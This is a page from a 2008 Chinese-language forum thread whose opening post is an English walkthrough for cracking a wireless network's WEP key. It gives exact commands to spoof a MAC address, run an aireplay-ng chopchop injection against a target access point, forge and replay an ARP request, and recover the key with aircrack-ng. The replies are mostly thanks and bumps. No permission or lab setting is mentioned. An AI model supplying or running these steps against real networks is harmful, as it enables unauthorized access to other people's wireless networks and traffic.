david98
发表于 2008-5-20 09:08
<p>We will also need to know the target's name (ESSID), MAC address, and the channel. Please note that my wireless device is "eth1" but yours may be different; use "iwconfig" to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor)<br/><font color="#0000ff" style="BACKGROUND-COLOR: #ffffff;">iwlist eth1 scan</font></p><p>Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.<br/><font color="#0000ff" style="BACKGROUND-COLOR: #ffffff;">rmmod ipw2200<br/>modprobe ipw2200 rtap_iface=1</font></p><p>Next enable wireless and change MAC (changing MAC is optional).<br/><font color="#0000ff">ifconfig eth1 up hw ether 00:11:22:33:44:55</font></p><p>Configure wireless w/ essid, channel, and a fake key.<br/><font color="#0000ff">iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed</font></p><p>Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.<br/><font color="#0000ff">airodump-ng --bssid <AP MAC> -w dump rtap0</font></p><p>Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).<br/><font color="#0000ff">aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1</font></p><p>A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "<font color="#ff0000">replay_dec-######.xor</font>"</p><p>Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.</p><p>Now we will create an arp-request packet using the aquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.<br/><font color="#0000ff">packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y <font color="#ff0000">replay_dec-####.xor</font> -w arp-request</font></p><p>Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.<br/><font color="#0000ff">aireplay-ng -2 -r arp-request eth1</font></p><p>Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.<br/><font color="#ff0000">aircrack-ng -z dump*.cap</font></p><p><font color="#ff0000"></font></p><p><font color="#ff0000">谁把关键部分翻页一下,谢谢</font></p>
sy100
发表于 2008-5-20 09:27
<p>谢谢! 再学习!!</p><p></p>
a191442029
发表于 2008-5-20 09:48
这个要顶的 前面的那个方法到最后一步抓包能显示数据就是 ARP那个一直是 0 试试这个
ljq228
发表于 2008-5-20 10:10
dddddddddddddd
chenguo
发表于 2008-5-20 12:42
谢谢高手指点,试试看!
meteor56
发表于 2008-5-20 12:54
<p>学习下,看我能搞不</p>
shjdwdf
发表于 2008-5-20 13:08
<p>这个要回复一下,你的帖子不会骗人的。</p>
wuhaoling
发表于 2008-5-20 13:38
<p class="MsoNormal" align="left" style="MARGIN: 0cm 0cm 0pt; TEXT-INDENT: 24pt; LINE-HEIGHT: 150%;"><span style="FONT-SIZE: 14pt; FONT-FAMILY: 楷体_gb2312; mso-bidi-font-size: 12.0pt;"><font size="4"><span lang="EN-US"><p></p></span></font></span></p><p></p><p></p><p></p><p></p><p></p><p></p><p class="MsoNormal" align="left" style="MARGIN: 0cm 0cm 0pt 18pt; TEXT-INDENT: -18pt; LINE-HEIGHT: 150%; TEXT-ALIGN: left; mso-list: l1 level1 lfo3; tab-stops: list 18.0pt;"><font size="4"><span lang="EN-US" style="FONT-SIZE: 12pt;"><p></p></span></font></p><p></p><p></p><p></p><p></p><p></p><p></p><p class="MsoNormal" align="left" style="MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 150%;"><font size="4"><span lang="EN-US" style="FONT-SIZE: 12pt;"><p></p></span></font></p><p></p><p></p><p></p><p></p><p></p><p></p><p class="MsoNormal" align="left" style="MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 150%;"><font size="4"><span lang="EN-US" style="FONT-SIZE: 12pt;"><p></p></span></font></p><p></p><p></p><p></p><p></p><p></p><p></p><p class="MsoNormal" align="left" style="MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 150%; TEXT-ALIGN: left;"><font size="4"><span lang="EN-US" style="FONT-SIZE: 12pt;"><p></p></span></font></p><p></p><p></p><p></p><p></p><p></p><p></p><p class="MsoNormal" align="left" style="MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 150%; TEXT-ALIGN: left;"><font size="4"><span lang="EN-US" style="FONT-SIZE: 12pt;"><font face="Times New Roman"><span style="mso-spacerun: yes;">写的不错,希望继续发扬</span></font></span></font></p>
wuhaoling
发表于 2008-5-20 13:38
<div id="textstyle_71223" style="FONT-SIZE: 10pt;"><p>我要看看看看看的</p><p>我要看看看看看的</p></div>
videre
发表于 2008-5-20 14:25
两个帖子有什么区别?
zxcvb
发表于 2008-5-20 15:38
<p>好多不知道的,看看可以吗</p>
beerli
发表于 2008-5-20 16:52
回复,参观学习,很多东西不懂,呵呵!
页:
1
2
[3]
4
5
6
7
8
9
10
11
12